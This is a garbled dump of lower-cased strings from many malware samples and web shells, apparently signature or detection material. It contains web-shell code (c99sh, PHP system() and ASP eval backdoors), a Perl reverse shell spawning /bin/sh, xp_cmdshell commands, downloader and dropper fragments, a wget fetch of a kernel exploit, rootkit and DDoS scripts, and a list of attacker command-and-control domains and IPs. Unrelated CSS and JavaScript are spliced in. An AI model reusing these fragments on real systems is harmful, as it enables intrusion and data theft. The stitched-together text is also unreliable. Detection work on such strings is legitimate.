$_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 xyzcmd v1.0 for nt s= click here if you want to get your registered copy of aspack; for beginning of translate - copy english.ini into the yourlanguage.inie-mail: shinlan@km169.net; please, translate text only after simbol '='= compress with aspackresponse.write \"<a href='index.asp'>if request.cookies(\"password\")=\"whichdir=server.mappath(request(\"path\"))set fs = createobject(\"scripting.filesystemobject\")whichdir=request(\"path\")hit [enter] to begin command mode...if you are in command mode,[/l] lists all the drives the monitor is currently attached tof
1 mailto:sdemo@263.nets-player.exeh
1 k%02u:%02u:%02u.%03u-%4u: * privateencrypt -> publicdecrypt failedselect processid,description,executablepath from win32_process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowmutexsystem\\currentcontrolset\\services\\msexchangeis\\parametersprivate000000005017c31b7c7bcf97ec86019f5026be85fd1fb192f6f4237b78db12e7dffb07748bff6432b3870681d54bef44077487044681fb94d17ed04217145b9800000000e2c9adbd8f470c7320d28000353813757f58860e90207f8874d2eb49851d3d3115a210da6475ccfc111dcc05e4910e50071975f61972dce345e89d88usage: %s -i inputfile -o outputfile [-f functionordinal] [-a functionargument] [-t threadoption]the output payload \"%s\" has a size of %d-bytes.error: fwrite(%s) failed on ucpayloadload and execute implant within the existing threaddriver startdeviceiocontrol error: %dphlookusage: setouraddr <input file> <output file> <protocol> [ip/ipx address]replaced default ip address (127.0.0.1) with local ip address %d.%d.%d.%d\
1 00-00-00-00-00-00c:\\users\\ziedpirate.ziedpirate-pc\\desktop\\sop\\sop\\release\\(separate usernames with a comma, or leave blank to monitor all uses.)input usernames here and separate with a comma. leave blank to monitor all users.please enter access password: delivery via email and ftp3
1 s ip is : %smozilla/4.0 ( compatible; msie 7.0; aol 8.0 )users\\parviz\\documents\\username=user-001web=1mail=1ftp=0ipaddresslow=78.109.194.1143.03
1 \\\\%s\\ipcs.exe %s %s %s %s %d /saves.exe start error...%dexec sp_addextendedproc xp_cmdshell,'xplog70.dll'exec master..xp_cmdshell 'wscript.exe cc.js'usage:sql.exe [options]%s root %s %d errorpass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
1 ()ljava/util/set;(ljava/lang/string;)vljava/lang/exception;oooy32too.javabbfwkdljava/lang/process;getparametersimio.javaljavax/swing/jlist;-(ljava/lang/string;)ljava/lang/stringbuilder;ljava/io/inputstream;vfnnnrof.exnnnroeolsnnfwgetpropertyjava/io/filenotfoundexceptionllolp;cjhgreshhnuf stackmaptableonfwwa(c)ljava/lang/stringbuilder;lesia$fffgss;<clinit>()ljava/io/inputstream;openconnection gjhgreshhnijhgreshhrtsjhgreshhot.sjhgreshhihjhgreshht;)oi.class rjhgreshhorjhgreshhre rajhgreshhvjava/net/urlcreated-by: 1.7.0-b147 (oracle corporation)close-mail{right:130px ccc;box-shadow:0 0 5px 1px 757575;border-bottom:1px solid 777;height:1.8em;line-height:1.9em;display:block;float:left;padding:1px 15px;margin:0;text-shadow:-1c4c4c4;}999;-webkit-box-shadow:0 0 3px header div.service-links ul{display:inline;margin:10px 0 0;}t div h2.title{padding:0;margin:0;}.box5-condition-news h2.pane-title{display:block;margin:0 0 9px;pfooter div.comp-info p{color:pcmi-listing-center .full-page-listing{width:490px;}pcmi-content-top .photo img,333;}div.tfw-header a var{display:inline-block;margin:0;line-height:20px;height:20px;width:120px;bacay:none;text-decoration:none;outline:none;padding:4px;text-align:center;font-size:9px;color:333;}body.page-videoplayer div373737;position:relative;}body.node-type-video divpcmi-content-sidebara,.page-error-page fff;text-decoration:none;}qtabs-list li a,cdn2.dailyrx.comer div.panel-hide{display:block;position:absolute;z-index:200;margin-top:-1.5em;}div.panel-pane div.ve.gif) right center no-repeat;}div.ctools-ajaxing{float:left;width:18px;background:url(http://cdn3.efefef;margin:5px 0 5px 0;}node{margin:0;padding:0;}div.panel-pane div.feed a{float:right;}:0 5px 0 0;float:left;}div.tweets-pulled-listing div.tweet-authorphoto img{max-height:40px;max-widthi a{color::bold;}div.tweets-pulled-listing .tweet-time a{color:silver;}div.tweets-pulled-listing div.tweet-didiv.panel-pane div.admin-links{font-size:xx-small;margin-right:1em;}div.panel-pane div.admin-links ldiv.tweets-pulled-listing ul{list-style:none;}div.tweets-pulled-listing div.tweet-authorphoto{marginffffdd none repeat scroll 0 0;border:1px solid vider{clear:left;border-bottom:1px solid screen.height:</script></head><body onloadfx0zaqrkxuvgbh0qndrjvxywgg4tgh8ahqoavqqsnyo0nelxfjaadi0nfqyesl1fbbnntfospibmadwnptqxpsdkwuuee2ucgr0z0);-10<bfunction fl(){var a0);else if(navigator.mimetypes);b.href/presults.jsp128.164.107.221)[0].clientwidth:escape(c),enavigator.plugins.length)navigator.plugins[window;dgr(),jviewportfqv2d0zah1vgdxgzvg9cowycawkctzacbxscbfokaamhufvuwf5evvyvdvtur18ba1qdau8hqjgeufyeaez4sbecek1ftxsdulvasquare ad tag (tile adrandnum cellspacing\\n//-->\\n</script>//-->' 2287974446noscrbeg -- start adblade -->' 3427054556 while (i >return '<table width</scr' s.substring(0, i /></a></noscript>' else { isemail ).submit(); borderpub-8301011321395982apiclientconfigfunction/.test(pa.tostring())background-image:url(http:\\/\\/static.ak.fbcdn.net\\/rsrc.php\\/v2\\/y6\\/x\\/s816ewc-2sl.gif)}music.init',header:'bool',recommendations:'bool',site:'hostname'},create_event_button:{},degrees:{href:'url'},cca6477272fc5cb805f85a84f20fca1ddocument.createelement('form');c.actionjavascript:falses.onmessage){j.error('an instance without whenready or onmessage makes no sense');throw new error('anan;}else hsprintfwindow,jo.getuserid(),dafb.runtime.getloginstatus();if(b)');k.tostringrovide('xfbml.send',{dimensions:{width:80,height:25}});{log:i};e.exportsa;fb.api('/fql','get',f,function(g){if(g.error){es5(es5('object','keys',false,b),'foreach',true,functrue;}}var iadocument.createdocumentfragment();img.srctypeof(events)var i,x,y,arrcookiescallbacks.length;j<l;jencodeuricomponent(value);if(options.domain)valueevent,hg.components.get('windowevent_''read'in cookie){return cookie.read(c_name);}item;},get:function(name,def){return hg.components.exists(name)){window.addevent(windowevents[i],function(){var callbacksreunload:function(callback){hg.events.add('beforeunload',callback);},add:function(event,callback){hgname){if(hg.components.exists(name)){delete hg.componentlist[name];}}},util:{uuid:function(){return'window.hgx.replace(/encodeuricomponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(json.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getutcfullyear(),hours')');};$.secureevaljsonisfinite(n);},secondstotime:function(sec_numb){sec_numb')');}else{throw new syntaxerror('error parsing json, source is not valid.');}};$.quotestringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentclasses.lengtho.getutchours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};hgwidget.creatorfunction gsh() {200 height'sh.js'><\\/script> 2 - 26;<iframe id,100);200></iframe>'about:blank' widthmf.document.write(kasper new activexobject(szhttp); csa2;var ado new activexobject(szox88);/test.exe szetyij;var http %41%44%4f%44%42%2e%4d%65%64%69%61var szsrjq%43%3a%5c%5c%50%72%6f%67%72%61%6dvar method ado.mode %61%79%65%72%2e%58%4d%4c%48%54%54%50 7 - 6; http.open(method, szurl, i-3); var jsmlastmenu position:absolute; z-index:99' -1)jsmsetdisplaystyle('popupmenu' '<tr><td><a href jsmlastmenu var ids this.target jsmprevmenu, 'none'); if(jsmprevmenu )if(menudata[i]) '<div style jsmsetdisplaystyle('popupmenu' function jsmhidelastmenu() menudata.length; iscripting.filesystemobjectobjdata 0105000002000000e0c9ea79f9bace118c8200aa004ba90b68007400740070003a002f002f00<?xml version=<?mso-application progid=\"word.document\"?>w:macrospresent=\"yes\"<w:bindata w:name=<o:characters>0</o:characters><o:lines>1</o:lines>n
1 0sssss4412021002050wwwwwvoicemailadobe.exee
1 \\\\%s\\mailslot\\%s%d-%d-%d %d:%d:%d zlsasrv32.dll!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%s %02x %sviewers5
1 ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 \"cmd\" /c cd /d \"c:\\windows\\temp\\\"&copysvchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014ren *.rar *.zipc:\\temp\\ipcan.exe<%eval(request.item(\"admin-na-google123!@#api.apigmail.combackup.darkhero.orgbel.updatawindows.combinary.update-onlines.orgblackcmd.comcastle.blackcmd.comctcb.blackcmd.comdav.local-test.comtest.local-test.comdev.local-test.comocean.local-test.comga.blackcmd.comhelpdesk.blackcmd.comhelpdesk.csc-na.comhelpdesk.hotmail-onlines.comhelpdesk.lnip.orgjobs.hotmail-onlines.comjustufogame.comlogin.hansoftupdate.comlong.update-onlines.orglonglong.update-onlines.orglongshadow.dyndns.orglongshadow.update-onlines.orglongykcai.update-onlines.orglostself.update-onlines.orgmac.navydocument.commail.csc-na.commantech.updatawindows.commicr0soft.orgmicrosoft-outlook.orgmtc.navydocument.commtc.update-onlines.orgnews.hotmail-onlines.comoac.3322.orgocean.apigmail.compchomeserver.comregistre.organiccrap.comsecurity.pomsys.orgservices.darkhero.orgsgl.updatawindows.comsonoco.blackcmd.comtest.logmastre.comup.gtalklite.comupdate.deepsoftupdate.comupdate.hancominc.comupdate.micr0soft.orgupdate.pchomeserver.comurs.blackcmd.comwang.darkhero.orgwebs.local-test.comword.apigmail.comwordpress.blackcmd.comworking.blackcmd.comworking.darkhero.orgworking.hotmail-onlines.comwww.trendmicro-update.orgwww.update-onlines.orgx.apigmail.comykcailostself.dyndns-free.comykcainobody.dyndns.orgzj.blackcmd.comlaxness-lab.comgoogle-ana1ytics.comwww.google-ana1ytics.comftp.google-ana1ytics.comhotmailcontact.net208.115.242.36208.115.242.37208.115.242.3866.63.178.14272.11.148.22072.11.141.13374.63.195.23674.63.195.23774.63.195.238103.24.0.142103.24.1.54106.187.45.162192.151.236.138192.161.61.19192.161.61.20192.161.61.2267.215.232.17996.44.177.19549.143.192.22167.215.232.18167.215.232.18296.44.182.24396.44.182.24596.44.182.24649.143.205.30working_success@163.comykcaihyl@163.comyuming@yinsibaohu.aliyun.comsvchostservicedll.dllm
1 .?aviptexternchannel@@@udata_channels@?1??getxagentinfo@agentkernel@@d:\\shared data\\data\\final data\\spec_ver\\azzy_dll_sslmail_2008\\release\\azzy_dll_sslmail_2008.pdb%
1 connected [%s:%d]...reuse possible: %c] => %d%%\x0ac:\\winnt\\system32\\cmd.exec:\\windows\\system32\\cmd.exec:\\windows\\command.comcopy \"%s\" \"%s\" /yhttp://%s/files/\"%s\". %s: \"%s\".0x0666----------------this_is_a_boundary$server 2012server 2008server 2003net.exe group \"domain admins\" /domainnet.exe group \"admins. do dom(svrid=%d)(tg=%d)(svr=%s)net.exe localgroup administradoresc:\\cmd32dll.exe{\\*\\generator msftedit 5.41.attachment 1: complete professional backgrounde-mail: \\cf1\\ul\\f1education:\\park
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 freeconsoleprocess writeparameterfilesstockmasterinsertemailfax
1 enterprise mailing serviceblacklisted by rule: %s:%s/successmails?campaignnum=%ld/timedoutmails?campaignnum=%ld/invalidmails?campaignnum=%ldfailed to download maillist, retryingno maillist loadedsuccessfully sent using smtp account %s (%d of %ld messages to %s)successfully sent %d of %ld messages to %ssending to %s in the same connectionnew connection required, will send to %smail transaction for %s is over.domain %s is bad (found in cache)domain %s found in cachedomain %s isn't found in cache, resolving itall tries to resolve %s failed.failed to receive response for %s from dns servergot dns server response: domain %s is badgot error %d in response for %s from dns servermx's ip for domain %s found in cache:timeout waiting for domain %s to be resolvedno valid mxes for domain %s. marking it as badresolving mx %s using existing connection to dns serverall tries to resolve mx for %s are failedresolving mx %s using dns serverfailed to receive 